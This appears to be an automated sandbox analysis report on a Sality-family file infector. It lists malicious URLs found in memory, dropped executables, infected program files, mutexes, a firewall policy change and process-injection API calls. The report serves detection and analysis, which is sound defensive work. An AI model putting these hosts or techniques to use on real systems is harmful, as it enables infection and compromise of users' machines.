Source: 1.0.0.2.exe, 1.0.0.2.exe, 00000000.00000003.2146823499.000000000110A000.00000004.00000020.00020000.00000000.sdmp, 1.0.0.2.exe, 00000000.00000002.2266264482.0000000002B48000.00000004.00000010.00020000.00000000.sdmp, 1.0.0.2.exe, 00000000.00000002.2272713358.0000000005763000.00000004.10000000.00040000.00000000.sdmp, 1.0.0.2.exe, 00000000.00000003.2146599123.00000000010B4000.00000004.00000020.00020000.00000000.sdmp, 1.0.0.2.exe, 00000000.00000002.2264312389.0000000000D53000.00000040.00000001.01000000.00000003.sdmp, 1.0.0.2.exe, 00000000.00000002.2266264482.0000000002B4E000.00000004.00000010.00020000.00000000.sdmp, 1.0.0.2.exe, 00000000.00000002.2267379038.00000000040EB000.00000004.00000010.00020000.00000000.sdmp, 1.0.0.2.exe, 00000000.00000002.2265887991.00000000010E7000.00000004.00000020.00020000.00000000.sdmp, 1.0.0.2.exe, 00000000.00000002.2266402880.0000000002BD5000.00000040.00001000.00020000.00000000.sdmp String found in binary or memory: http://g2.arrowhitech.com/xs.jpg
Source: 1.0.0.2.exe, 00000000.00000002.2265887991.0000000001144000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://g2.arrowhitech.com/xs.jpg?6bfcc6=28308248
Source: 1.0.0.2.exe, 00000000.00000002.2265887991.0000000001144000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://g2.arrowhitech.com/xs.jpg?6bfcc6=28308248jh7
Source: 1.0.0.2.exe, 00000000.00000002.2265887991.0000000001144000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://g2.arrowhitech.com/xs.jpg?f4ae4e=160354060
Source: 1.0.0.2.exe, 00000000.00000002.2265887991.0000000001144000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://g2.arrowhitech.com/xs.jpg?f4ae4e=160354060&o
Source: 1.0.0.2.exe, 00000000.00000003.2255038602.000000000760A000.00000004.00000020.00020000.00000000.sdmp, 1.0.0.2.exe, 00000000.00000002.2273488135.000000000760A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://g2.arrowhitech.com/xs.jpg?f4ae4e=160354060-
Source: 1.0.0.2.exe, 00000000.00000002.2265887991.0000000001144000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://g2.arrowhitech.com/xs.jpg?f4ae4e=160354060704hM
Source: 1.0.0.2.exe, 00000000.00000002.2265887991.0000000001144000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://g2.arrowhitech.com/xs.jpg?f4ae4e=1603540608oI
Source: 1.0.0.2.exe, 00000000.00000002.2265887991.0000000001144000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://g2.arrowhitech.com/xs.jpg?f4ae4e=160354060Nh
Source: 1.0.0.2.exe, 00000000.00000002.2265887991.0000000001144000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://g2.arrowhitech.com/xs.jpg?f4ae4e=160354060xoP
Source: 1.0.0.2.exe, 00000000.00000002.2266402880.0000000002BE0000.00000040.00001000.00020000.00000000.sdmp String found in binary or memory: http://kukutrustnet777.info/home.gif
Source: 1.0.0.2.exe, 00000000.00000002.2266402880.0000000002BE0000.00000040.00001000.00020000.00000000.sdmp String found in binary or memory: http://kukutrustnet777888.info/
Source: 1.0.0.2.exe, 00000000.00000002.2266402880.0000000002BE0000.00000040.00001000.00020000.00000000.sdmp String found in binary or memory: http://kukutrustnet777888.info/DisableTaskMgrSoftware
Source: 1.0.0.2.exe, 00000000.00000002.2266402880.0000000002BE0000.00000040.00001000.00020000.00000000.sdmp String found in binary or memory: http://kukutrustnet888.info/home.gif
Source: 1.0.0.2.exe, 00000000.00000002.2266402880.0000000002BE0000.00000040.00001000.00020000.00000000.sdmp String found in binary or memory: http://kukutrustnet987.info/home.gif
Source: 1.0.0.2.exe, 00000000.00000002.2264312389.0000000000C69000.00000040.00000001.01000000.00000003.sdmp String found in binary or memory: http://pan.baidu.com/s/1qWKD5ve
Source: Amcache.hve.2.dr String found in binary or memory: http://upx.sf.net
Source: SciTE.exe.2.dr String found in binary or memory: http://www.activestate.com
Source: SciTE.exe.2.dr String found in binary or memory: http://www.activestate.comHolger
Source: SciTE.exe.2.dr String found in binary or memory: http://www.baanboard.com
Source: SciTE.exe.2.dr String found in binary or memory: http://www.baanboard.comBrendon
Source: 1.0.0.2.exe, 1.0.0.2.exe, 00000000.00000003.2146823499.000000000110A000.00000004.00000020.00020000.00000000.sdmp, 1.0.0.2.exe, 00000000.00000002.2266264482.0000000002B48000.00000004.00000010.00020000.00000000.sdmp, 1.0.0.2.exe, 00000000.00000002.2272713358.0000000005763000.00000004.10000000.00040000.00000000.sdmp, 1.0.0.2.exe, 00000000.00000003.2146599123.00000000010B4000.00000004.00000020.00020000.00000000.sdmp, 1.0.0.2.exe, 00000000.00000002.2264312389.0000000000D53000.00000040.00000001.01000000.00000003.sdmp, 1.0.0.2.exe, 00000000.00000002.2266264482.0000000002B4E000.00000004.00000010.00020000.00000000.sdmp, 1.0.0.2.exe, 00000000.00000002.2267379038.00000000040EB000.00000004.00000010.00020000.00000000.sdmp, 1.0.0.2.exe, 00000000.00000002.2265887991.00000000010E7000.00000004.00000020.00020000.00000000.sdmp, 1.0.0.2.exe, 00000000.00000002.2266402880.0000000002BD5000.00000040.00001000.00020000.00000000.sdmp String found in binary or memory: http://www.careerdesk.org/images/xs.jpg
Source: 1.0.0.2.exe, 00000000.00000002.2265887991.000000000111D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.careerdesk.org/images/xs.jpg?5059c3=10531718
Source: 1.0.0.2.exe, 00000000.00000002.2265887991.000000000111D000.00000004.00000020.00020000.00000000.sdmp, 1.0.0.2.exe, 00000000.00000003.2255038602.000000000760A000.00000004.00000020.00020000.00000000.sdmp, 1.0.0.2.exe, 00000000.00000002.2273488135.000000000760A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.careerdesk.org/images/xs.jpg?ad5654=34079484
Source: SciTE.exe.2.dr String found in binary or memory: http://www.develop.com
Source: SciTE.exe.2.dr String found in binary or memory: http://www.develop.comDeepak
Source: 1.0.0.2.exe, 00000000.00000002.2266402880.0000000002BE0000.00000040.00001000.00020000.00000000.sdmp String found in binary or memory: http://www.klkjwre9fqwieluoi.info/
Source: 1.0.0.2.exe, 00000000.00000002.2266402880.0000000002BE0000.00000040.00001000.00020000.00000000.sdmp String found in binary or memory: http://www.klkjwre9fqwieluoi.info/amsint32.sysGetSystemDirectoryAdrivers
Source: SciTE.exe.2.dr String found in binary or memory: http://www.lua.org
Source: SciTE.exe.2.dr String found in binary or memory: http://www.rftp.com
Source: SciTE.exe.2.dr String found in binary or memory: http://www.rftp.comJosiah
Source: SciTE.exe.2.dr String found in binary or memory: http://www.scintilla.org
Source: SciTE.exe.2.dr String found in binary or memory: http://www.scintilla.org/scite.rng
Source: SciTE.exe.2.dr String found in binary or memory: http://www.spaceblue.com
Source: SciTE.exe.2.dr String found in binary or memory: http://www.spaceblue.comMathias
Source: 1.0.0.2.exe, 00000000.00000002.2264312389.0000000000C69000.00000040.00000001.01000000.00000003.sdmp String found in binary or memory: http://www.youku.com/playlist_show/id_25824322.html
Source: rksowY.exe, 00000002.00000003.2178512612.0000000000BC3000.00000004.00000020.00020000.00000000.sdmp, rksowY.exe, 00000002.00000002.2243579607.0000000000BBD000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.comrobat
Source: SciTE.exe.2.dr String found in binary or memory: https://www.smartsharesystems.com/
Source: SciTE.exe.2.dr String found in binary or memory: https://www.smartsharesystems.com/Morten
Source: SciTE.exe.2.dr Binary or memory string: _winapi_getrawinputdata _winapi_getrawinputdeviceinfo _winapi_getregiondata _winapi_getregisteredrawinputdevices \ memstr_bae7b752-b
Source: Yara match File source: 0.2.1.0.0.2.exe.400000.0.unpack, type: UNPACKEDPE

System Summary

Source: 0.2.1.0.0.2.exe.111ff18.7.raw.unpack, type: UNPACKEDPE Matched rule: Detects executables packed with Sality Polymorphic Code Generator or Simple Poly user or Sality Author: ditekSHen
Source: 0.2.1.0.0.2.exe.2be2300.11.raw.unpack, type: UNPACKEDPE Matched rule: Detects executables packed with Sality Polymorphic Code Generator or Simple Poly user or Sality Author: ditekSHen
Source: 0.2.1.0.0.2.exe.2be25f4.12.raw.unpack, type: UNPACKEDPE Matched rule: Detects executables packed with Sality Polymorphic Code Generator or Simple Poly user or Sality Author: ditekSHen
Source: 0.2.1.0.0.2.exe.2b60000.10.unpack, type: UNPACKEDPE Matched rule: Detects executables packed with Sality Polymorphic Code Generator or Simple Poly user or Sality Author: ditekSHen
Source: 0.2.1.0.0.2.exe.10eb0bc.8.unpack, type: UNPACKEDPE Matched rule: Detects executables packed with Sality Polymorphic Code Generator or Simple Poly user or Sality Author: ditekSHen
Source: C:\Users\user\AppData\Local\Temp\winmefmb.exe, type: DROPPED Matched rule: Detects executables packed with Sality Polymorphic Code Generator or Simple Poly user or Sality Author: ditekSHen
Source: C:\iuepn.exe, type: DROPPED Matched rule: Detects executables packed with Sality Polymorphic Code Generator or Simple Poly user or Sality Author: ditekSHen
Source: MyProg.exe.2.dr Static PE information: section name: Y|uR
Source: iuepn.exe.0.dr Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: rksowY.exe.0.dr Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: winmefmb.exe.0.dr Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: C:\Users\user\Desktop\1.0.0.2.exe Code function: 0_2_02B69652 0_2_02B69652
Source: C:\Users\user\Desktop\1.0.0.2.exe Code function: 0_2_02B722A0 0_2_02B722A0
Source: C:\Users\user\Desktop\1.0.0.2.exe Code function: 0_2_02B66A85 0_2_02B66A85
Source: C:\Users\user\AppData\Local\Temp\rksowY.exe Code function: 2_2_005B6076 2_2_005B6076
Source: C:\Users\user\AppData\Local\Temp\rksowY.exe Code function: 2_2_005B6D00 2_2_005B6D00
Source: Joe Sandbox View Dropped File: C:\Users\user\AppData\Local\Temp\rksowY.exe 4354970CCC7CD6BB16318F132C34F6A1B3D5C2EA7FF53E1C9271905527F2DB07
Source: C:\Users\user\AppData\Local\Temp\rksowY.exe Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 5344 -s 1328
Source: MyProg.exe.2.dr Static PE information: Resource name: RT_VERSION type: MIPSEB-LE ECOFF executable not stripped - version 0.79
Source: 1.0.0.2.exe Binary or memory string: \StringFileInfo\%s\OriginalFilename vs 1.0.0.2.exe
Source: 1.0.0.2.exe, 00000000.00000002.2264312389.0000000000CC3000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: \StringFileInfo\%s\OriginalFilename vs 1.0.0.2.exe
Source: 1.0.0.2.exe, 00000000.00000002.2264312389.0000000000CC3000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: N/A%02X-%02X-%02X-%02X-%02X-%02Xwww.dywt.com.cnGlobalMemoryStatusExKernel32.dllx86 Family %s Model %s Stepping %s%08X-%08X-%08X-%08X\StringFileInfo\%s\Comments\StringFileInfo\%s\ProductVersion\StringFileInfo\%s\ProductName\StringFileInfo\%s\OriginalFilename\StringFileInfo\%s\LegalTrademarks\StringFileInfo\%s\LegalCopyright\StringFileInfo\%s\InternalName\StringFileInfo\%s\FileDescription\StringFileInfo\%s\CompanyName%s\StringFileInfo\%s\FileVersion040904E4000%x, \VarFileInfo\TranslationopenMicrosoft Internet Explorer vs 1.0.0.2.exe
Source: 1.0.0.2.exe, 00000000.00000002.2264312389.0000000000D37000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: OriginalFilename_R2Launcher.exe@ vs 1.0.0.2.exe
Source: 1.0.0.2.exe Binary or memory string: OriginalFilename_R2Launcher.exe@ vs 1.0.0.2.exe
Source: 1.0.0.2.exe Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
Source: 0.2.1.0.0.2.exe.111ff18.7.raw.unpack, type: UNPACKEDPE Matched rule: INDICATOR_EXE_Packed_SimplePolyuser author = ditekSHen, description = Detects executables packed with Sality Polymorphic Code Generator or Simple Poly user or Sality
Source: 0.2.1.0.0.2.exe.2be2300.11.raw.unpack, type: UNPACKEDPE Matched rule: INDICATOR_EXE_Packed_SimplePolyuser author = ditekSHen, description = Detects executables packed with Sality Polymorphic Code Generator or Simple Poly user or Sality
Source: 0.2.1.0.0.2.exe.2be25f4.12.raw.unpack, type: UNPACKEDPE Matched rule: INDICATOR_EXE_Packed_SimplePolyuser author = ditekSHen, description = Detects executables packed with Sality Polymorphic Code Generator or Simple Poly user or Sality
Source: 0.2.1.0.0.2.exe.2b60000.10.unpack, type: UNPACKEDPE Matched rule: INDICATOR_EXE_Packed_SimplePolyuser author = ditekSHen, description = Detects executables packed with Sality Polymorphic Code Generator or Simple Poly user or Sality
Source: 0.2.1.0.0.2.exe.10eb0bc.8.unpack, type: UNPACKEDPE Matched rule: INDICATOR_EXE_Packed_SimplePolyuser author = ditekSHen, description = Detects executables packed with Sality Polymorphic Code Generator or Simple Poly user or Sality
Source: C:\Users\user\AppData\Local\Temp\winmefmb.exe, type: DROPPED Matched rule: INDICATOR_EXE_Packed_SimplePolyuser author = ditekSHen, description = Detects executables packed with Sality Polymorphic Code Generator or Simple Poly user or Sality
Source: C:\iuepn.exe, type: DROPPED Matched rule: INDICATOR_EXE_Packed_SimplePolyuser author = ditekSHen, description = Detects executables packed with Sality Polymorphic Code Generator or Simple Poly user or Sality
Source: rksowY.exe.0.dr Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: iuepn.exe.0.dr Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: rksowY.exe.0.dr Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: winmefmb.exe.0.dr Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: iuepn.exe.0.dr Static PE information: Section .text
Source: winmefmb.exe.0.dr Static PE information: Section .text
Source: rksowY.exe.0.dr Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESERVED size: 0x100000 address: 0x0
Source: classification engine Classification label: mal100.spre.troj.evad.winEXE@5/15@10/5
Source: C:\Users\user\Desktop\1.0.0.2.exe Code function: 0_2_02B6CC92 LookupPrivilegeValueA,AdjustTokenPrivileges,AdjustTokenPrivileges,FindCloseChangeNotification,GetTokenInformation,GetTokenInformation,lstrcmpiA,CreateMutexA,VirtualAllocEx,WriteProcessMemory,CreateRemoteThread,FindCloseChangeNotification, 0_2_02B6CC92
Source: C:\Users\user\AppData\Local\Temp\rksowY.exe Code function: 2_2_005B119F GetCurrentProcess,OpenProcessToken,AdjustTokenPrivileges,CloseHandle,CloseHandle, 2_2_005B119F
Source: C:\Users\user\Desktop\1.0.0.2.exe Code function: 0_2_02B6D2B0 CreateToolhelp32Snapshot,Process32First,Process32Next,CreateMutexA,FindCloseChangeNotification, 0_2_02B6D2B0
Source: C:\Users\user\Desktop\1.0.0.2.exe File created: C:\Users\user\Desktop\VF.dll
Source: C:\Users\user\Desktop\1.0.0.2.exe Mutant created: \Sessions\1\BaseNamedObjects\csrss.exeM_496_
Source: C:\Users\user\Desktop\1.0.0.2.exe Mutant created: \Sessions\1\BaseNamedObjects\registryM_92_
Source: C:\Users\user\Desktop\1.0.0.2.exe Mutant created: \Sessions\1\BaseNamedObjects\smss.exeM_328_
Source: C:\Users\user\Desktop\1.0.0.2.exe Mutant created: \Sessions\1\BaseNamedObjects\csrss.exeM_412_
Source: C:\Users\user\Desktop\1.0.0.2.exe Mutant created: \Sessions\1\BaseNamedObjects\wininit.exeM_488_
Source: C:\Users\user\Desktop\1.0.0.2.exe Mutant created: \Sessions\1\BaseNamedObjects\svchost.exeM_928_
Source: C:\Users\user\Desktop\1.0.0.2.exe Mutant created: \Sessions\1\BaseNamedObjects\fontdrvhost.exeM_780_
Source: C:\Users\user\Desktop\1.0.0.2.exe Mutant created: \Sessions\1\BaseNamedObjects\winlogon.exeM_560_
Source: C:\Users\user\Desktop\1.0.0.2.exe Mutant created: \Sessions\1\BaseNamedObjects\uxJLpe1m
Source: C:\Users\user\Desktop\1.0.0.2.exe Mutant created: \Sessions\1\BaseNamedObjects\fontdrvhost.exeM_788_
Source: C:\Users\user\Desktop\1.0.0.2.exe Mutant created: \Sessions\1\BaseNamedObjects\dwm.exeM_996_
Source: C:\Users\user\Desktop\1.0.0.2.exe Mutant created: \Sessions\1\BaseNamedObjects\lsass.exeM_652_
Source: C:\Users\user\Desktop\1.0.0.2.exe Mutant created: \Sessions\1\BaseNamedObjects\services.exeM_632_
Source: C:\Users\user\Desktop\1.0.0.2.exe Mutant created: \Sessions\1\BaseNamedObjects\svchost.exeM_868_
Source: C:\Users\user\Desktop\1.0.0.2.exe Mutant created: \Sessions\1\BaseNamedObjects\svchost.exeM_752_
Source: C:\Users\user\Desktop\1.0.0.2.exe File created: C:\Users\user\AppData\Local\Temp\rksowY.exe
Source: C:\Users\user\Desktop\1.0.0.2.exe File read: C:\Windows\system.ini
Source: C:\Users\user\Desktop\1.0.0.2.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: 1.0.0.2.exe Virustotal: Detection: 86%
Source: unknown Process created: C:\Users\user\Desktop\1.0.0.2.exe "C:\Users\user\Desktop\1.0.0.2.exe"
Source: C:\Users\user\Desktop\1.0.0.2.exe Process created: C:\Users\user\AppData\Local\Temp\rksowY.exe C:\Users\user\AppData\Local\Temp\rksowY.exe
Source: C:\Users\user\AppData\Local\Temp\rksowY.exe Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 5344 -s 1328
Source: C:\Users\user\Desktop\1.0.0.2.exe Process created: C:\Users\user\AppData\Local\Temp\rksowY.exe C:\Users\user\AppData\Local\Temp\rksowY.exe
Source: C:\Users\user\Desktop\1.0.0.2.exe Section loaded: apphelp.dll
Source: C:\Users\user\Desktop\1.0.0.2.exe Section loaded: iphlpapi.dll
Source: C:\Users\user\Desktop\1.0.0.2.exe Section loaded: rasapi32.dll
Source: C:\Users\user\Desktop\1.0.0.2.exe Section loaded: version.dll
Source: C:\Users\user\Desktop\1.0.0.2.exe Section loaded: wininet.dll
Source: C:\Users\user\Desktop\1.0.0.2.exe Section loaded: winmm.dll
Source: C:\Users\user\Desktop\1.0.0.2.exe Section loaded: rasman.dll
Source: C:\Users\user\Desktop\1.0.0.2.exe Section loaded: mpr.dll
Source: C:\Users\user\Desktop\1.0.0.2.exe Section loaded: sspicli.dll
Source: C:\Users\user\Desktop\1.0.0.2.exe Section loaded: mswsock.dll
Source: C:\Users\user\Desktop\1.0.0.2.exe Section loaded: iertutil.dll
Source: C:\Users\user\Desktop\1.0.0.2.exe Section loaded: windows.storage.dll
Source: C:\Users\user\Desktop\1.0.0.2.exe Section loaded: wldp.dll
Source: C:\Users\user\Desktop\1.0.0.2.exe Section loaded: profapi.dll
Source: C:\Users\user\Desktop\1.0.0.2.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\Desktop\1.0.0.2.exe Section loaded: sfc.dll
Source: C:\Users\user\Desktop\1.0.0.2.exe Section loaded: sfc_os.dll
Source: C:\Users\user\Desktop\1.0.0.2.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\Desktop\1.0.0.2.exe Section loaded: winhttp.dll
Source: C:\Users\user\Desktop\1.0.0.2.exe Section loaded: winnsi.dll
Source: C:\Users\user\Desktop\1.0.0.2.exe Section loaded: urlmon.dll
Source: C:\Users\user\Desktop\1.0.0.2.exe Section loaded: srvcli.dll
Source: C:\Users\user\Desktop\1.0.0.2.exe Section loaded: netutils.dll
Source: C:\Users\user\Desktop\1.0.0.2.exe Section loaded: uxtheme.dll
Source: C:\Users\user\Desktop\1.0.0.2.exe Section loaded: dnsapi.dll
Source: C:\Users\user\Desktop\1.0.0.2.exe Section loaded: rasadhlp.dll
Source: C:\Users\user\Desktop\1.0.0.2.exe Section loaded: msimg32.dll
Source: C:\Users\user\Desktop\1.0.0.2.exe Section loaded: dwrite.dll
Source: C:\Users\user\Desktop\1.0.0.2.exe Section loaded: fwpuclnt.dll
Source: C:\Users\user\Desktop\1.0.0.2.exe Section loaded: dhcpcsvc.dll
Source: C:\Users\user\Desktop\1.0.0.2.exe Section loaded: clinkapi.dll
Source: C:\Users\user\Desktop\1.0.0.2.exe Section loaded: textshaping.dll
Source: C:\Users\user\Desktop\1.0.0.2.exe Section loaded: textinputframework.dll
Source: C:\Users\user\Desktop\1.0.0.2.exe Section loaded: coreuicomponents.dll
Source: C:\Users\user\Desktop\1.0.0.2.exe Section loaded: coremessaging.dll
Source: C:\Users\user\Desktop\1.0.0.2.exe Section loaded: ntmarta.dll
Source: C:\Users\user\Desktop\1.0.0.2.exe Section loaded: coremessaging.dll
Source: C:\Users\user\Desktop\1.0.0.2.exe Section loaded: wintypes.dll
Source: C:\Users\user\Desktop\1.0.0.2.exe Section loaded: wintypes.dll
Source: C:\Users\user\Desktop\1.0.0.2.exe Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Temp\rksowY.exe Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\rksowY.exe Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Local\Temp\rksowY.exe Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Local\Temp\rksowY.exe Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Local\Temp\rksowY.exe Section loaded: netutils.dll
Source: C:\Users\user\AppData\Local\Temp\rksowY.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\rksowY.exe Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\rksowY.exe Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\rksowY.exe Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\rksowY.exe Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\rksowY.exe Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\rksowY.exe Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\rksowY.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\rksowY.exe Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\Temp\rksowY.exe Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\rksowY.exe Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\rksowY.exe Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Local\Temp\rksowY.exe Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Local\Temp\rksowY.exe Section loaded: rasadhlp.dll
Source: C:\Users\user\AppData\Local\Temp\rksowY.exe Section loaded: fwpuclnt.dll
Source: C:\Users\user\AppData\Local\Temp\rksowY.exe Section loaded: ntvdm64.dll
Source: C:\Users\user\AppData\Local\Temp\rksowY.exe Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\rksowY.exe Section loaded: textshaping.dll
Source: C:\Users\user\AppData\Local\Temp\rksowY.exe Section loaded: textinputframework.dll
Source: C:\Users\user\AppData\Local\Temp\rksowY.exe Section loaded: coreuicomponents.dll
Source: C:\Users\user\AppData\Local\Temp\rksowY.exe Section loaded: coremessaging.dll
Source: C:\Users\user\AppData\Local\Temp\rksowY.exe Section loaded: ntmarta.dll
Source: C:\Users\user\AppData\Local\Temp\rksowY.exe Section loaded: coremessaging.dll
Source: C:\Users\user\AppData\Local\Temp\rksowY.exe Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Temp\rksowY.exe Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Temp\rksowY.exe Section loaded: wintypes.dll
Source: C:\Users\user\Desktop\1.0.0.2.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0358b920-0ac7-461f-98f4-58e32cd89148}\InProcServer32
Source: C:\Users\user\Desktop\1.0.0.2.exe File written: C:\Windows\system.ini
Source: Window Recorder Window detected: More than 3 window changes detected
Source: 1.0.0.2.exe Static file information: File size 5242880 > 1048576
Source: 1.0.0.2.exe Static PE information: Raw size of UPX1 is bigger than: 0x100000 < 0x4cfc00
Source: Binary string: C:\Data\svn\autoit\branch_3.3.16\bin\SciTE\SciTE.pdb source: SciTE.exe.2.dr

Data Obfuscation

Source: C:\Users\user\AppData\Local\Temp\rksowY.exe Unpacked PE file: 2.2.rksowY.exe.5b0000.0.unpack .text:EW;.rdata:W;.data:W;.reloc:W;.aspack:EW;.adata:EW; vs .text:ER;.rdata:R;.data:W;.reloc:R;.aspack:EW;.adata:EW;
Source: C:\Users\user\Desktop\1.0.0.2.exe Code function: 0_2_02BEBCD0 EntryPoint,LoadLibraryA,GetProcAddress,ExitProcess,VirtualProtect,VirtualProtect,VirtualProtect, 0_2_02BEBCD0
Source: initial sample Static PE information: section where entry point is pointing to: pu
Source: 1.0.0.2.exe Static PE information: section name: pu
Source: VF.dll.0.dr Static PE information: section name: UPX2
Source: rksowY.exe.0.dr Static PE information: section name: .aspack
Source: rksowY.exe.0.dr Static PE information: section name: .adata
Source: MyProg.exe.2.dr Static PE information: section name: PELIB
Source: MyProg.exe.2.dr Static PE information: section name: Y|uR
Source: SciTE.exe.2.dr Static PE information: section name: u
Source: Uninstall.exe.2.dr Static PE information: section name: EpNuZ
Source: C:\Users\user\Desktop\1.0.0.2.exe Code function: 0_2_02B73600 push eax; ret 0_2_02B7362E
Source: C:\Users\user\Desktop\1.0.0.2.exe Code function: 0_2_02B6072E push eax; iretd 0_2_02B6072F
Source: C:\Users\user\AppData\Local\Temp\rksowY.exe Code function: 2_2_005B1638 push dword ptr [005B3084h]; ret 2_2_005B170E
Source: C:\Users\user\AppData\Local\Temp\rksowY.exe Code function: 2_2_005B2D9B push ecx; ret 2_2_005B2DAB
Source: C:\Users\user\AppData\Local\Temp\rksowY.exe Code function: 2_2_005B6014 push 005B14E1h; ret 2_2_005B6425
Source: C:\Users\user\AppData\Local\Temp\rksowY.exe Code function: 2_2_005B600A push ebp; ret 2_2_005B600D
Source: 1.0.0.2.exe Static PE information: section name: .rsrc entropy: 7.617344200663995
Source: 1.0.0.2.exe Static PE information: section name: pu entropy: 7.7594391065047255
Source: iuepn.exe.0.dr Static PE information: section name: .text entropy: 7.988165420952291
Source: rksowY.exe.0.dr Static PE information: section name: .text entropy: 7.81169422100848
Source: winmefmb.exe.0.dr Static PE information: section name: .text entropy: 7.988165420952291
Source: MyProg.exe.2.dr Static PE information: section name: Y|uR entropy: 6.934800097867026
Source: SciTE.exe.2.dr Static PE information: section name: u entropy: 6.934468071332093
Source: Uninstall.exe.2.dr Static PE information: section name: EpNuZ entropy: 6.934379233926794
Source: initial sample Static PE information: section name: UPX0
Source: initial sample Static PE information: section name: UPX1

Persistence and Installation Behavior

Source: C:\Users\user\AppData\Local\Temp\rksowY.exe System file written: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe
Source: C:\Users\user\AppData\Local\Temp\rksowY.exe System file written: C:\Program Files\7-Zip\Uninstall.exe
Source: C:\Users\user\AppData\Local\Temp\rksowY.exe System file written: C:\Program Files (x86)\AutoIt3\Examples\Helpfile\Extras\MyProg.exe
Source: C:\Users\user\Desktop\1.0.0.2.exe File created: C:\Users\user\AppData\Local\Temp\winmefmb.exe
Source: C:\Users\user\AppData\Local\Temp\rksowY.exe File created: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe
Source: C:\Users\user\AppData\Local\Temp\rksowY.exe File created: C:\Program Files\7-Zip\Uninstall.exe
Source: C:\Users\user\Desktop\1.0.0.2.exe File created: C:\iuepn.exe
Source: C:\Users\user\Desktop\1.0.0.2.exe File created: C:\Users\user\Desktop\VF.dll
Source: C:\Users\user\Desktop\1.0.0.2.exe File created: C:\Users\user\AppData\Local\Temp\rksowY.exe
Source: C:\Users\user\AppData\Local\Temp\rksowY.exe File created: C:\Program Files (x86)\AutoIt3\Examples\Helpfile\Extras\MyProg.exe
Source: C:\Users\user\Desktop\1.0.0.2.exe Registry key value modified: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile

Hooking and other Techniques for Hiding and Protection

Source: 1.0.0.2.exe, 00000000.00000002.2266402880.0000000002BE0000.00000040.00001000.00020000.00000000.sdmp Binary or memory string: KeServiceDescriptorTable
Source: unknown Network traffic detected: HTTP traffic on port 49710 -> 799
Source: C:\Users\user\Desktop\1.0.0.2.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
